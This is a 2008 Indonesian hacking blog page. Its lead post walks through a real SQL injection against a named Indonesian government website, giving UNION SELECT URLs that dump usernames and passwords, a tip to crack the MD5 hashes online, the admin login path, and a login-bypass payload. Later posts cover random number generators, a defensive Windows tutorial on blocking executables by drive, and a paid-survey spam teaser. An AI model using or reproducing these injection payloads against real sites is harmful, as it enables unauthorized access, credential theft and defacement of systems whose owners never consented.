Indonesia Hacking Site

21 September 2008

SQL injection (lagi dan lagi) di situs pemerintah

Oleh tomahawk_underground
Published: September 9, 2008

langsung aja....saya masuk ke situs http://www.bkkbn.go.id, kemudia ke URL http://www.bkkbn.go.id/article.php?cid=27

up...yang paling gampang untuk memeriksa situs ini bisa diinjek atau tidak (tapi gk selamanya juga sih) ada lah dengan menghapus baris sebelah tanda = , kmudian diisi dengan tanda '.

jika ada pesan error, misalnya :
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in bla bla bla....

yaa tandanya calon2 isa diinject nih... (tapi gk selamanya bisa lhooo)

kemudian saya masukkin SQL injection seperti ini :

http://www.bkkbn.go.id/article.php?cid=27+UNION+SELECT+1,2,3,4+FROM+user+--

arti dari : 1,2,3,4 ini = coba2 aja...diurutin tuh satu2 dari angka 1,2,3,4,....... sampe nongol field nya
arti dari : user = nama table (nebak...)

nah..nongol deh field nya :

ada di field 3...(gitu deh...). terus selanjutnya ganti angka 3 tadi ama inject nya...saya merubahnya jadi bgini :

http://www.bkkbn.go.id/article.php?cid=27+UNION+SELECT+1,2,concat_ws(0x3a,user_name,user_password),4+FROM+user+--

angka 3 diganti jadi concat_ws(0x3a,user_name,user_password)
meminta username ama password (gitu deh...)

nah...password di enkrip kan tuh pake MD5, yaa tinggal di dekrip aja lah...yg gampang sih dekrip ke http://www.passcracking.com

udeh tuh dapet kan hasil dekrip nya...sekarang tinggal cari halaman admin loginnya . seperti biasa, rata-rata situs standart tuh menu adminnya terletak di folder admin, jadi bgini :

http://www.bkkbn.go.id/admin/index.php

naahh...masuk deh

selanjutnya tinggal masukin aja user ID ama password nya.

JREENGGG!!!! REBES!! masuk deh
ada yang sebagai administrator, ada yang sebagai penulis

sebenernya sih bisa juga masuk sebagai penulis pake inject

username : 1' or '1=1'/*
password : 1' or '1=1'/*

tapi hanya sebagai penulis, bukan administrator.

akhir kata saya mau mengucapkan terimakasih kepada :
# My Lord Allah SWT
# kampus tercinta IPB, khususnya jurusan teknik komputer, kan kuangkat nama kampus ku
# member jasakom, khususnya yg nongkrong di forum (pl4y312, pitaqh, aurel666, massmissile, kucing item, cruzen, t0m, sanca,mmm...siapa lagi yaa...byk bgt deh..maap yg gk kesebut, tapi luv u all )

special thanks to :
# Om PIRUS (makasih free email nya )
# th30nly (ngutang banyak ama lo nih ilmunya)
# JS member dgn ID "new-bee" (yg ikut kerjasama pas pagi-pagi, wekekeke...)
# Tique --> artikel ini special buat kamu, tanda permohonan maaf dari saya (daripada di deface, mending jadi artikel). sekalian buat membuktikan kalo saya bukan hacker, apalagi hacker autis.

salam

tomahawk[at]jasakom[dot]org

Sambungannya disini...

Random Number Generator

Oleh Dendi Suhubdy A.K.A Cron of NuLL
Published: Januari 2, 2008

Random number generator (RNG) atau pembangkit bilangan acak, kerap kali diimplementasikan di dalam berbagai algoritma kriptografi. Contohnya saja pada algoritma kriptografi Deffie-Helman yang memerlukan bilangan prima sebagai input. Nah, cara yang paling efektif untuk mendapatkan suatu bilangan prima acak adalah dengan cara melakukan pembangkitan bilangan acak kemudian mengetes apakah bilangan yang dibangkitkan itu berupa bilangan acak atau tidak.
Random number generator (RNG) atau pembangkit bilangan acak, kerap kali diimplementasikan di dalam berbagai algoritma kriptografi. Contohnya saja pada algoritma kriptografi Deffie-Helman yang memerlukan bilangan prima sebagai input. Nah, cara yang paling efektif untuk mendapatkan suatu bilangan prima acak adalah dengan cara melakukan pembangkitan bilangan acak kemudian mengetes apakah bilangan yang dibangkitkan itu berupa bilangan acak atau tidak.

Sekarang pertanyaannya adalah……apa algoritma untuk melakukan pembangkitan bilangan acak tersebut? Yupzzz, Anda dapat menggunakan rand() atau Math.Random() pada C++ atau System.Random pada C# (red. C sharp) atau java.util.Random pada Java. Namun, jika Anda memeriksa algoritma yang digunakan oleh fungsi-fungsi tersebut, Anda akan menemukan bahwa itu adalah RNG yang lambat…..masih ada cara untuk mempercepatnya beberapa CPU clock cylces…lagipula baru-baru ini ditemukan security flaw pada fungsi rand() sehingga bilangan acak ini dapat dibangkitkan kembali (artinya tidak benar-benar acak) dan ini merupakan ancaman yang serius untuk dunia kriptografi.
Kalau Anda adalah orang yang haus akan ilmu hacking dan matematika diskrit…….inilah jawabannya……..

Algortima pertama adalah R250/5231 yang diciptakan oleh Kirkpatrick dan Stoll yang dipublikasikan di A Very Fast Shift-Register Sequence Random Number Generator, J. Computational Physics, vol 40, pp. 517-526.
Algoritma yang kedua adalah Mersenne Twister yang diciptakan pada tahun 1996 oleh Matsumora dan Nishimura.

Source codenya dapat di compile dengan gcc v3.3…….atau kalau Anda benar-benar kreatif, ubahlah source code ini sesuai dengan keinginan Anda……tetapi jangan lupa pada kontribusi orang-orang yang menciptakan algoritma ini. Upzzzzzzzz, gw lupa kalau source code java dan C#nya juga ada. Berikut linknya dari semua source codenya.

http://www.4shared.com/file/32947855/4bc0a7c/RNG_520_dan_MT.html

Sambungannya disini...

Teknik Blokir Semua File Executable Dan Script Di Suatu Drive

Virus computer yang tersebar sekarang umumnya berupa file executable (*.exe, *.scr; *.com;*.pif) dan file script (seperti *.vbs dan *.bat), bagaimanakah caranya supaya file-file ini tidak dapat dijalankan oleh kita dalam suatu drive termasuk di flashdisk sehingga computer kita tetap aman dari serangan virus karena mungkin saja file virus tersebut menggunakan ikon seperti file dokumen ataupun ikon folder?
Dengan teknik ini, anda dapat memblok semua file script dan executable dalam suatu drive, sehingga tidak ada kemungkinan salah menjalankan program / script yang menyamar seperti file data. Contohnya saat anda mencolokan flashdisk bervirus menjadi drive e, dan drive tersebut telah diblok script dan executablenya sebelumnya, maka sekalipun anda klik berulang kali file virus tersebut, tetap saja file virus tersebu

tidak dapat dijalankan dan pesan yang muncul seperti gambar berikut ini :

Kekurangannya adalah teknik ini tidak pandang bulu semua file executable dan script non virus juga tidak dapat dijalankan, jadi berhati-hatilah !!!! Jangan sampai menset blokir di drive system Windows.

Caranya :

1. Buka Control Panel
conpanel.bmp

2.Pilih Administrative Tools

3.Pilih Local Security Policy

4.Selanjutnya pilih Software Restriction Policies, klik kanan padanya pilih Create New Policies

5.Maka akan terbentuk beberapa object baru di samping kanan.

6.Pilih Additional Rules, dan klik kanan

7.Pilih New Path Rules, seperti gambar berikut ini :

8. Masukkan alamat drive yang ingin diblokir semua script dan executablenya, misalnya e:\, seperti gambar berikut ini :

Untuk Security Level, jika anda pilih Unrestricted berarti blokir terbuka dan semua file di drive tersebut dapat dijalankan, tetapi jika Disallowed maka semua file executable dan script tidak dapat dijalankan, hanya file data seperti doc, xls, jpg dan lain-lainnya yang dapat dijalankan secara normal.

Selanjutnya Appy dan OK.

Pada Labtop saya, semua drive untuk data dan flashdisk diblokir, hanya system windows dan CD rom yang dibiarkan terbuka, bahkan folder My Documents saya pun diblokir supaya jika ada file virus yang masuk ke sana, tidak akan dapat dijalankan, kecuali blokir ini dibuka terlebih dahulu, entah dengan mengubah properties path blokiran menjadi Unrestricted ataupun dengan menghapusnya dari system Local Security tersebut. Jadinya seperti gambar berikut ini :

Demikian tutorial ini semoga berguna. Jika kita gunakan secara luas maka teknik ini akan mematikan penyebaran banyak virus executable dan script (*.vbs, *.js, *.bat; *.hta; *.wsf dll), tetapi tidak menutup kemungkinan penyebaran virus macro dan virus html, karena file data seperti document word dan html tetap dapat bekerja.

Sambungannya disini...

Bisnis Online

Klik link di bawah ini, pendaftaran gratis, cuma surveys aja dapat U$ 27.... yang mau buruan daftar mumpung gratis